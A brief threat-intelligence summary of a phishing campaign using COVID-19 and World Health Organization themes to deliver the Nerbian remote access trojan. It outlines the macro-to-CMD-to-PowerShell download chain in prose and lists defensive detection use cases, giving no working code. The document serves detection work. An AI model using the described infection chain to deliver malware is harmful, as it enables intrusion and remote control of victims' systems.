Phishing with World Health Organization Themes
Phishing with World Health Organization Themes
Industry: N/A | Level: Tactical | Source: ProofPoint
Research from ProofPoint has identified the distribution of Nerbian remote access trojan (RAT), through phishing emails using COVID-19 and World Health Organization themes. The threat campaign was traced back to getting its start April 26th, 2022, with emails targeting entities located in Italy, Spain, and the United Kingdom. Emails delivered contain either a malicious document or a compressed archive containing a malicious document. The process flow upon the execution of the embedded macro is, CMD calls PowerShell to download a BAT file, the BAT file launches the PowerShell to download additional payloads including the malicious RAT. The RAT establishes persistence and has the capabilities to download additional payloads as needed. There is currently no attribution placed on the Nerbian RAT.
Anvilogic Scenario:
- Nerbian RAT Infection Chain from Malicious Document
Anvilogic Use Cases:
- Malicious Document Execution
- Compressed File Execution
- Suspicious Executable by CMD.exe
- Executable Create Script Process
- Invoke-WebRequest Command
- Executable File Written to Disk
- Suspicious Executable by Powershell
- Executable Process from Suspicious Folder
- Network Connection with Suspicious Folder
- Create/Modify Schtasks